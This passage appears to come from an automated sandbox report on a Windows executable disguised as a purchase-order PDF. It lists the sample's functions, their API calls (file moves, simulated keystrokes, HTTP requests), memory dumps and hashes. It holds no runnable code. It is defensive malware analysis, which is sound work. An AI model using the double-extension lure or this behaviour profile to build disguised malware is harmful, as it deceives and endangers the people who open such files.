                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 36519070200301ABD320DF29CC85F5BB7E8EB48715F540A1EF995E7292D7B4E949CB29
                                                                                                                                                                                                                                                                                                            Function 004534EB Relevance: 13.6, APIs: 9, Instructions: 150filestringCOMMON
                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                              • Part of subcall function 0040FFB0: GetFullPathNameW.KERNEL32(00000000,00000104,C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exe,?,C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exe,004A8E80,C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exe,0040F3D2), ref: 0040FFCA
                                                                                                                                                                                                                                                                                                              • Part of subcall function 00436AC4: GetFileAttributesW.KERNEL32(?,0044BD82,?,?,?), ref: 00436AC9
                                                                                                                                                                                                                                                                                                            • lstrcmpiW.KERNEL32(?,?), ref: 0045355E
                                                                                                                                                                                                                                                                                                            • MoveFileW.KERNEL32(?,?), ref: 0045358E
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: File$AttributesFullMoveNamePathlstrcmpi
                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                            • API String ID: 978794511-0
                                                                                                                                                                                                                                                                                                            • Opcode ID: 905b41a6b5f1f1e7811aa1c06e555ad1605d40905c9a381d53b63ac73f12040d
                                                                                                                                                                                                                                                                                                            • Instruction ID: dcad70f49e32ae1adaf0c812d378eb0bba467e0a617048934f4a65f03e3a0b24
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 905b41a6b5f1f1e7811aa1c06e555ad1605d40905c9a381d53b63ac73f12040d
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 665162B25043406AC724EF61D885ADFB3E8AFC8305F44992EB94992151E73DD34DC767
                                                                                                                                                                                                                                                                                                            Function 004417BC Relevance: 13.6, APIs: 9, Instructions: 142COMMON
                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                                                            • Opcode ID: 2697ea5a26a9fc7488a3d070abad83f7d669ddccf749f4bfc66ff3ac1f4b4023
                                                                                                                                                                                                                                                                                                            • Instruction ID: b1e2397247e50d0c7000acf5a2db8631a214b417b603bec0598d849dd48054e0
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2697ea5a26a9fc7488a3d070abad83f7d669ddccf749f4bfc66ff3ac1f4b4023
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E54128332402806BE320A75DB8C4ABBFB98E7A2362F50443FF18196520D76678C5D339
                                                                                                                                                                                                                                                                                                            Function 00445CF9 Relevance: 13.6, APIs: 9, Instructions: 69sleepkeyboardwindowCOMMON
                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                              • Part of subcall function 0044593E: GetWindowThreadProcessId.USER32(00000001,00000000), ref: 0044595D
                                                                                                                                                                                                                                                                                                              • Part of subcall function 0044593E: GetCurrentThreadId.KERNEL32 ref: 00445964
                                                                                                                                                                                                                                                                                                              • Part of subcall function 0044593E: AttachThreadInput.USER32(00000000,?,00000001,00478FA7), ref: 0044596B
                                                                                                                                                                                                                                                                                                            • MapVirtualKeyW.USER32(00000025,00000000), ref: 00445D15
                                                                                                                                                                                                                                                                                                            • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 00445D35
                                                                                                                                                                                                                                                                                                            • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000), ref: 00445D3F
                                                                                                                                                                                                                                                                                                            • MapVirtualKeyW.USER32(00000025,00000000), ref: 00445D45
                                                                                                                                                                                                                                                                                                            • PostMessageW.USER32(00000000,00000100,00000027,00000000), ref: 00445D66
                                                                                                                                                                                                                                                                                                            • Sleep.KERNEL32(00000000), ref: 00445D70
                                                                                                                                                                                                                                                                                                            • MapVirtualKeyW.USER32(00000025,00000000), ref: 00445D76
                                                                                                                                                                                                                                                                                                            • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 00445D8B
                                                                                                                                                                                                                                                                                                            • Sleep.KERNEL32(00000000,?,00000101,00000027,00000000), ref: 00445D8F
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                            • API String ID: 2014098862-0
                                                                                                                                                                                                                                                                                                            • Opcode ID: 621277f82d70151dd5f553487d646ea3797e8fa9e9e6e4ab5ab83039983e6254
                                                                                                                                                                                                                                                                                                            • Instruction ID: b085f3065cf9cd100f04f322da00d4b037e108fc79bf5967fdabce1cd6d2e74b
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 621277f82d70151dd5f553487d646ea3797e8fa9e9e6e4ab5ab83039983e6254
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7B116971790704B7F620AB958C8AF5A7399EF88B11F20080DF790AB1C1C9F5E4418B7C
                                                                                                                                                                                                                                                                                                            Function 0045427D Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 259libraryloaderCOMMON
                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: AddressProc_malloc$_strcat_strlen
                                                                                                                                                                                                                                                                                                            • String ID: AU3_FreeVar
                                                                                                                                                                                                                                                                                                            • API String ID: 2184576858-771828931
                                                                                                                                                                                                                                                                                                            • Opcode ID: 04cda4dcaee16d464bdfc589b53969bd54b57a6706cbcc76e367f128a167b500
                                                                                                                                                                                                                                                                                                            • Instruction ID: c940ad03d776ce5ee908f8b881b33357b51647545ffc53e819ca791e1fdac2da
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 04cda4dcaee16d464bdfc589b53969bd54b57a6706cbcc76e367f128a167b500
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: EDA18DB5604205DFC300DF59C480A2AB7E5FFC8319F1489AEE9554B362D739ED89CB8A
                                                                                                                                                                                                                                                                                                            Function 00401D10 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 235COMMON
                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                            • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00401D5A
                                                                                                                                                                                                                                                                                                            • DestroyWindow.USER32(?), ref: 0042A751
                                                                                                                                                                                                                                                                                                            • UnregisterHotKey.USER32(?), ref: 0042A778
                                                                                                                                                                                                                                                                                                            • FreeLibrary.KERNEL32(?), ref: 0042A822
                                                                                                                                                                                                                                                                                                            • VirtualFree.KERNEL32(?,00000000,00008000), ref: 0042A854
                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: Free$DestroyLibrarySendStringUnregisterVirtualWindow
                                                                                                                                                                                                                                                                                                            • String ID: close all
                                                                                                                                                                                                                                                                                                            • API String ID: 4174999648-3243417748
                                                                                                                                                                                                                                                                                                            • Opcode ID: 1faab716d740b0a97759489cfcf3fe87684f2c70f03003e2ca00eb1c9fd5b387
                                                                                                                                                                                                                                                                                                            • Instruction ID: e23b5dd52123a376b0379481fe8be5d2f02d07e70979f80a1c72d587d5a24a2c
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1faab716d740b0a97759489cfcf3fe87684f2c70f03003e2ca00eb1c9fd5b387
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: FFA17075A102248FCB20EF55CC85B9AB3B8BF44304F5044EEE90967291D779AE85CF9D
                                                                                                                                                                                                                                                                                                            Function 0044AA1F Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 171networkCOMMON
                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                            • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 0044AA5A
                                                                                                                                                                                                                                                                                                            • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0044AA8D
                                                                                                                                                                                                                                                                                                            • InternetQueryOptionW.WININET(00000000,0000001F,?,?), ref: 0044AAF9
                                                                                                                                                                                                                                                                                                            • InternetSetOptionW.WININET(00000000,0000001F,?,00000004), ref: 0044AB11
                                                                                                                                                                                                                                                                                                            • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0044AB20
                                                                                                                                                                                                                                                                                                            • HttpQueryInfoW.WININET(00000000,00000005,?,00000000,00000000), ref: 0044AB61
                                                                                                                                                                                                                                                                                                              • Part of subcall function 0044286A: GetLastError.KERNEL32(00000000,0044AA07,?,00000000,00000000,00000001,?,?), ref: 00442880
                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: HttpInternet$OptionQueryRequest$ConnectErrorInfoLastOpenSend
                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                            • API String ID: 1291720006-3916222277
                                                                                                                                                                                                                                                                                                            • Opcode ID: fd0d9a71f1b9f9aed2e07c44adb1cce69882d59a8a6dee97d1abd644e851efd9
                                                                                                                                                                                                                                                                                                            • Instruction ID: 782b6278bf246bef60821ca34847c3ce69a0d92f774604c9678bedd135ce19ea
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: fd0d9a71f1b9f9aed2e07c44adb1cce69882d59a8a6dee97d1abd644e851efd9
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9C51E6B12803016BF320EB65CD85FBBB7A8FB89704F00091EF74196181D7B9A548C76A
                                                                                                                                                                                                                                                                                                            Function 0046BB59 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 168networkCOMMON
                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: ErrorLastselect
                                                                                                                                                                                                                                                                                                            • String ID: HH
                                                                                                                                                                                                                                                                                                            • API String ID: 215497628-2761332787
                                                                                                                                                                                                                                                                                                            • Opcode ID: d15483ea6440eafbe7487eb2e68bacdbc24e9ec8681ed56f1cdb501d55a74ba2
                                                                                                                                                                                                                                                                                                            • Instruction ID: a252b81ccbce03d1e7b1b0efababa2c0a0929072778302a7b1202b90a7697d70
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d15483ea6440eafbe7487eb2e68bacdbc24e9ec8681ed56f1cdb501d55a74ba2
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: BF51E4726043005BD320EB65DC42F9BB399EB94324F044A2EF558E7281EB79E944C7AA
                                                                                                                                                                                                                                                                                                            Function 0047D2F8 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 162COMMON
                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: __snwprintf__wcsicoll_wcscpy
                                                                                                                                                                                                                                                                                                            • String ID: , $$0vH$AUTOITCALLVARIABLE%d$CALLARGARRAY
                                                                                                                                                                                                                                                                                                            • API String ID: 1729044348-3708979750
                                                                                                                                                                                                                                                                                                            • Opcode ID: 19d8c814bf70bb05cadf871115a188aa6336bc7b5c41e4e48777219efcb9f973
                                                                                                                                                                                                                                                                                                            • Instruction ID: 823d0c4529048d9f890bbf28e75db1a658c609af9319d28fcdda535ef0d13f31
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 19d8c814bf70bb05cadf871115a188aa6336bc7b5c41e4e48777219efcb9f973
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E651A571514300ABD610EF65C882ADFB3A4EFC4348F048D2FF54967291D779E949CBAA
                                                                                                                                                                                                                                                                                                            Function 0044BBC9 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 100filestringCOMMON
                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                              • Part of subcall function 0040FFB0: GetFullPathNameW.KERNEL32(00000000,00000104,C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exe,?,C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exe,004A8E80,C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exe,0040F3D2), ref: 0040FFCA
                                                                                                                                                                                                                                                                                                            • lstrcmpiW.KERNEL32(?,?), ref: 0044BC04
                                                                                                                                                                                                                                                                                                            • MoveFileW.KERNEL32(?,?), ref: 0044BC38
                                                                                                                                                                                                                                                                                                            • _wcscat.LIBCMT ref: 0044BCAA
                                                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 0044BCB7
                                                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 0044BCCB
                                                                                                                                                                                                                                                                                                            • SHFileOperationW.SHELL32 ref: 0044BD16
                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: File_wcslen$FullMoveNameOperationPath_wcscatlstrcmpi
                                                                                                                                                                                                                                                                                                            • String ID: \*.*
                                                                                                                                                                                                                                                                                                            • API String ID: 2326526234-1173974218
                                                                                                                                                                                                                                                                                                            • Opcode ID: 79917c867e5dc746cbfe3ebb0135d92afbab4952e7fca4f485a184e9ce72b521
                                                                                                                                                                                                                                                                                                            • Instruction ID: 9e4979448571685848097db6772507fbfe8bfb8d1337cd0032b1ea927bdad9db
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 79917c867e5dc746cbfe3ebb0135d92afbab4952e7fca4f485a184e9ce72b521
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4B3183B14083019AD724EF21C5D5ADFB3E4EFC8304F444D6EB98993251EB39E608D7AA
                                                                                                                                                                                                                                                                                                            Function 004366BE Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 90COMMON
                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                              • Part of subcall function 00436328: _wcsncpy.LIBCMT ref: 0043633C
                                                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 004366DD
                                                                                                                                                                                                                                                                                                            • GetFileAttributesW.KERNEL32(?), ref: 00436700
                                                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 0043670F
                                                                                                                                                                                                                                                                                                            • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 00436727
